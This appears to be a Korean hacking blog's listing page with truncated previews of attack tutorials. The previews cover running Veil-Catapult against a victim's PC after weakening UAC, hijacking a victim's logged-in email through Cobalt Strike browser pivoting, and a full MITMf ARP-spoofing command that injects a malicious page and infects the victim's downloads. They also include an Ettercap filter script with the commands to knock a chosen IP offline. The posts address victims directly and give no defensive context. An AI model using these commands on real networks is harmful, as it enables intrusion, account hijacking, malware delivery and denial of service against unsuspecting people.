3. 웹 애플리케이션 취약점 진단137 ip 주소만으로 해킹하기 [veil-catapult] https://github.com/Veil-Framework/Veil-Catapult.git GitHub - Veil-Framework/Veil-Catapult: Veil Catapult is no longer supported Veil Catapult is no longer supported. Contribute to Veil-Framework/Veil-Catapult development by creating an account on GitHub. github.com [현재는 더이상 서포트 되지 않는 툴입니다.] 우선적으로 피해자 컴이 윈7 이하인것이 좋고요. 제어판의 검색창에 uac를 검색하거나 해서 관리센터-사용자 계정 컨트롤 설정 변경 을 눌러서 보안 설정을 제일 약하게 밑으로 내려 설정해 주어.. 2023. 12. 27. 브라우저 피봇 - 아디와 비번없이 해킹하기 코볼트 스트라이크가 필요합니다. 해킹된 피해자가 이메일에 들어가 있는 경우에 브라우저를 피보팅 하는것을 말합니다. 1.해킹 세션을 연결한후 프로세스 리스트에서 explorer.exe를 screenshot 해서 한 400초 정도로 잡아서 틀어줍니다. view-screenshots 에 가면 스크린샷들을 볼수 있습니다. 아이디와 비번은 모른 채로 피해자가 이메일에만 들어가 있는 것을 볼수 있게 됩니다. 2.해킹된 컴퓨터 우클릭 - explore - browser pivot 선택 체크가 된것과 체크되지 않은 프로세서가 있는데 체크 안된것은 아무 작동하지 않는 프로세서, 체크 된것이 작동하는 프로세서 입니다. 체크 된 것을 클릭해주시고 아래 프록시 서버 포트는 5글자의 아무 포트나 넣어주고 launch 3.그러면.. 2023. 12. 27. MITMF를 이용해서 웹사이트 해킹하기 & 다운로드 하는 파일에 자동 바이러스 주입 [보너스:웹사이트 이미지 거꾸로 만들기] 1.다른 웹사이트 자체를 해킹한다기 보다는 MITMF 공격에 악성코드를 넣은 index.html을 주입시킴으로써 해당 피해자가 해커의 사이트에 진입하여 감염 된 후 어느 사이트를 들어가던 해당 악성 index.html 화면이 아래에 보이게 됩니다. service apache2 start 로 apache 서버를 실행시켜 준 뒤 # mitmf --spoof --arp --hsts -i eth0 --gateway 게이트웨이 주소 --target 피해자 컴퓨터 아이피주소 --inject --html-file /ver/www/html/index.html 해당 명령어를 사용해 주면 됩니다. 2.감염된 피해자가 인터넷에서 무언가를 다운로드 받을때 해당 다운로드 파일에 mitmf가 자동으로 악성코드를 주입하여 다운로드.. 2023. 12. 27. 도스 공격하는 방법 feat. Ettercap dos.elt if (ip.src == '192.168.0.8' || ip.dst == '192.168.0.8') { drop(); kill(); msg("도스 공격중\n"); } 1.dos.elt를 메모장으로 생성 후 아이피 주소 부분을 피해자 아이피로 두개 다 변경해준뒤 저장합니다. 2.dos.elt 파일이 있는 경로로 이동 후 etterfilter dos.elt -o dos.ef [dos.ef로 바꾸어주어 ettercap에서 사용하도록 만듭니다.] 3.ettercap -i eth0 -T -q -F dos.ef -M ARP //// [상세 사용법] https://blog.naver.com/PostView.naver?blogId=dhwkffk&logNo=221977220688&parentCategor.. 2023. 12. 27. 이전 1 ··· 3 4 5 6 7 8 9 ··· 35 다음